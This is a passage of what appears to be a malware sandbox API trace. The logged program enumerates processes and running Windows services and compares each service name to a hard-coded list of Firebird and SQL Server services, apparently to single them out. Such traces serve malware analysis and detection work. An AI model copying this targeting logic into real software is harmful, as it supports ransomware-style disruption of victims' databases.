(lpString="DeviceCensus.exe") returned 16 [0212.296] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0212.297] CloseHandle (hObject=0x3ac) returned 1 [0212.297] Sleep (dwMilliseconds=0x1f4) [0214.677] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b940 [0214.677] EnumServicesStatusExW (in: hSCManager=0x236b940, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0214.678] GetLastError () returned 0xea [0214.678] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40fae90 [0214.678] EnumServicesStatusExW (in: hSCManager=0x236b940, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40fae90, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40fae90, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0214.679] CloseServiceHandle (hSCObject=0x236b940) returned 1 [0214.679] lstrlenW (lpString="Appinfo") returned 7 [0214.679] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0214.679] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0214.679] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0214.679] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0214.679] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0214.679] lstrlenW (lpString="AppXSvc") returned 7 [0214.679] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0214.679] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0214.679] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0214.679] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0214.680] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0214.680] lstrlenW (lpString="Audiosrv") returned 8 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0214.680] lstrlenW (lpString="BFE") returned 3 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0214.680] lstrlenW (lpString="BITS") returned 4 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0214.680] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0214.680] lstrlenW (lpString="CDPSvc") returned 6 [0214.680] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0214.680] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0214.680] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0214.680] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0214.680] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0214.681] lstrlenW (lpString="ClickToRunSvc") returned 13 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0214.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0214.681] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0214.681] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0214.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0214.681] lstrlenW (lpString="ClipSVC") returned 7 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0214.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0214.681] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0214.681] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0214.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0214.681] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0214.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0214.681] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0214.681] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0214.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0214.681] lstrlenW (lpString="CryptSvc") returned 8 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0214.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0214.681] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0214.681] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0214.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0214.681] lstrlenW (lpString="DcomLaunch") returned 10 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0214.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0214.681] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0214.681] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0214.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0214.681] lstrlenW (lpString="DeviceAssociationService") returned 24 [0214.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0214.682] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0214.682] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0214.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0214.682] lstrlenW (lpString="Dhcp") returned 4 [0214.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0214.682] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0214.682] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0214.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0214.682] lstrlenW (lpString="Dnscache") returned 8 [0214.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0214.682] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0214.682] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0214.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0214.682] lstrlenW (lpString="DoSvc") returned 5 [0214.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0214.682] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0214.682] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0214.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0214.682] lstrlenW (lpString="DPS") returned 3 [0214.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0214.682] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0214.682] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0214.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0214.682] lstrlenW (lpString="DusmSvc") returned 7 [0214.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0214.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0214.683] lstrlenW (lpString="EventLog") returned 8 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0214.683] lstrlenW (lpString="EventSystem") returned 11 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0214.683] lstrlenW (lpString="FontCache") returned 9 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0214.683] lstrlenW (lpString="gpsvc") returned 5 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0214.683] lstrlenW (lpString="iphlpsvc") returned 8 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0214.683] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0214.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0214.683] lstrlenW (lpString="KeyIso") returned 6 [0214.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0214.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0214.683] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0214.684] lstrlenW (lpString="LanmanServer") returned 12 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0214.684] lstrlenW (lpString="LanmanWorkstation") returned 17 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0214.684] lstrlenW (lpString="lfsvc") returned 5 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0214.684] lstrlenW (lpString="LicenseManager") returned 14 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0214.684] lstrlenW (lpString="lmhosts") returned 7 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0214.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0214.684] lstrlenW (lpString="LSM") returned 3 [0214.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0214.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0214.684] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0214.684] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0214.685] lstrlenW (lpString="MpsSvc") returned 6 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0214.685] lstrlenW (lpString="NcbService") returned 10 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0214.685] lstrlenW (lpString="netprofm") returned 8 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0214.685] lstrlenW (lpString="NlaSvc") returned 6 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0214.685] lstrlenW (lpString="nsi") returned 3 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0214.685] lstrlenW (lpString="PcaSvc") returned 6 [0214.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0214.685] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0214.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0214.686] lstrlenW (lpString="PlugPlay") returned 8 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0214.686] lstrlenW (lpString="Power") returned 5 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0214.686] lstrlenW (lpString="ProfSvc") returned 7 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0214.686] lstrlenW (lpString="RpcEptMapper") returned 12 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0214.686] lstrlenW (lpString="RpcSs") returned 5 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0214.686] lstrlenW (lpString="SamSs") returned 5 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0214.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0214.686] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0214.686] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0214.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0214.686] lstrlenW (lpString="Schedule") returned 8 [0214.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0214.687] lstrlenW (lpString="SecurityHealthService") returned 21 [0214.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0214.687] lstrlenW (lpString="SENS") returned 4 [0214.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0214.687] lstrlenW (lpString="ShellHWDetection") returned 16 [0214.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0214.687] lstrlenW (lpString="Spooler") returned 7 [0214.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0214.687] lstrlenW (lpString="sppsvc") returned 6 [0214.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0214.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0214.687] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0214.687] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0214.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0214.687] lstrlenW (lpString="SSDPSRV") returned 7 [0214.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0214.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0214.688] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0214.688] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0214.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x450 [0214.692] Process32FirstW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.693] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.693] lstrlenW (lpString="System") returned 6 [0214.693] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.694] lstrlenW (lpString="smss.exe") returned 8 [0214.694] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, 